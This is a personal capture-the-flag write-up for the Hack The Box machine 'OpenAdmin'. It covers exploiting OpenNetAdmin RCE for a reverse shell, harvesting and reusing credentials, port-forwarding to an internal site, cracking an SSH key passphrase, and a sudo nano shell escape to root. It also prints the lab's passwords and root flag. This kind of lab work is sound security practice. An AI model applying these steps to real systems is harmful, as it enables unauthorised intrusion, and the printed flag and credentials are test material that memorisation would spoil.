openadmin - writeup - Konstantinovitz

## Enumeration ### 80 HTTP / Webserver Directory enum reveals: - `/music` - `/artwork` - `/sierra` - Navigation to: http://10.10.10.171/music/ reveals a new webpage. - Pressing the login button redirects to: http://10.10.10.171/ona/ - Appears to be a "OpenNetAdmin" page. - Authenticated as guest - Searchsploit reveals a couple #x/web/RCE - Front page reveals service version `v18.1.1` - Exploit is available ## Initial Access - Clone exploit code from [github](https://github.com/amriunix/ona-rce) - Verify the vuln: `python3 ona-rce.py check http://10.10.10.171/ona/` - Execute: `python3 ona-rce.py exploit http://10.10.10.171/ona/` - Reverse shell granted <3 ## Privesc - `www-data` - Unusual files in `/opt` - Folder contains openadmin code - Credentials? - Attempted to connect via mysql as `www-data` user (current) - users - `joanna` - home - `/home/joanna` - denied - `/home/jimmy` - denied - internal services ``` www-data@openadmin:/home$ netstat -tuln netstat -tuln Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN udp 0 0 127.0.0.53:53 0.0.0.0:* ``` - credential hunting - `grep -ri "password" /opt/ona` ``` www-data@openadmin:/opt/ona/www/config$ grep -ri "pass" ./ grep -ri "pass" ./ ./auth_ldap.config.php://$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword'; ./config.inc.php:// Think of it as a cache or an easy way to pass data around ;) ``` So we got something resembling a password here: `mysecretbindpassword` Attempting to password spray that using above mentioned users and password yields no result... Possibly a dummy password? - Confirmed by inspecting source code: https://github.com/opennetadmin/ona/blob/master/www/config/auth_ldap.config.php Further inspection of source reveals default credentials: `admin:admin`. Authenticating as `admin:admin` in the webUI let's us inspect partial database connection info: ### Database Password Whattabout database password?? Some google foo yields the following [forum thread](https://opennetadmin.com/forum_archive/4/t-85.html) which conveniently contains the full path for the database credentials <3: ``` www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php cat database_settings.inc.php <?php $ona_contexts=array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, ), ), 'description' => 'Default data context', 'context_color' => '#D3DBFF', ), ); ``` ``` mysql -u ona_sys -h localhost --database ona_default --password n1nj4W4rri0R! ``` Aaaand we're in... Enumeration of the database reveals a `users` table containing the following password hashes: ``` guest:098f6bcd4621d373cade4e832627b4f6 admin:21232f297a57a5a743894a0e4a801fc3 ``` Let's attempt to crack 'em: ``` guest:test admin:admin ``` Soooo... not likely to be helpful as these are just the default web app passwords.... I'll just respray the database password: `n1nj4W4rri0R!` and I get a hit for: ``` jimmy:n1nj4W4rri0R! ``` ### Escalating to `jimmy` - not in sudoers file - nofing interesting in `/home/jimmy` - `$ env` - nada - no interesting procs - fact that we can't run sudo also excludes [[SUID Binaries]] - no interesting groups - running `who | w | last` reveals that `joanna` has recently been logged in - no crontab - possibly rabbit hole this dude? - throwing `pspy`at it.... - nada - Got stuck and took a hint: `virtualhosts` ### Apache `vhosts` ``` cat /etc/apache2/sites-enabled/*.conf ``` ``` jimmy@openadmin:/opt$ cat /etc/apache2/sites-enabled/*.conf Listen 127.0.0.1:52846 <VirtualHost 127.0.0.1:52846> ServerName internal.openadmin.htb DocumentRoot /var/www/internal <IfModule mpm_itk_module> AssignUserID joanna joanna </IfModule> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> <VirtualHost *:80> # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. ServerName openadmin.htb ServerAdmin [email protected] DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf </VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet ``` Interesting stuff is located at `/var/www/internal`. - source inspection reveals - `index.php` which contains a password hash: `00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1` - likely a SHA-512 hash? - Cracks to `Revealed` - `main.php` which, upon execution will reveal the conents of `/home/joanna/.ssh/id_rsa` - because why not? So let's attempt to access that website.... And a website returns at: ``` curl http://127.0.0.1:52846 ``` How may I got about doing a port forward??? ``` sshpass -p n1nj4W4rri0R! ssh -L 52846:127.0.0.1:52846 [email protected] ``` Navigating to http://localhost:52846 on my local browser now reveals a login prompt. Using credentials `jimmy:Revealed` I get to access the `id_rsa` key for `joanna`. It's encrypted tho, had to take a hint here, apparently I need to extract a hash from it which can then be cracked using hashcat or similar: The hash is extracted using `ssh2john id_rsa` and the cracked: ``` ╭─[λ]-[admin.konstantinovitz.com]-[/targets/openadmin]-[10.10.10.171] ╰─> john --wordlist=/arsenal/wordlists/rockyou.txt id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [MD5/bcrypt-pbkdf/[3]DES/AES 32/64]) Cost 1 (KDF/cipher [0:MD5/AES 1:MD5/[3]DES 2:bcrypt-pbkdf/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status bloodninjas (id_rsa) ``` Soooo we get the password: `bloodninjas` - very cool.... Let's decrypt the `id_rsa` key and SSH in as ### `joanna` - home dir ``` User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv Sudoers file: /etc/sudoers.d/joanna is readable joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv ``` So we can go ahead and: `sudo /bin/nano /opt/priv` without having to enter sudo password <3. Having a looksie at [gtfobins - nano](https://gtfobins.github.io/gtfobins/nano/) reveals a means of getting root shell: ``` nano ^R^X reset; sh 1>&0 2>&0 ``` ### `root` We get a root shell <3 ``` cat /root/root.txt 80b6331d20bd9be7e1daec0a4cbc7923 ``` ## Lessons Learned - Better understanding of `sudo` - Spend too much time and confusion on the port forward - have socat binaries on hand - document the ssh port forward - Didn't have john and related utils properly installed - Had no real idea about the whole virtualhosts thingy - Was attempting to inspect the weird locally bound port - Gave up as my port forward skills sucked too much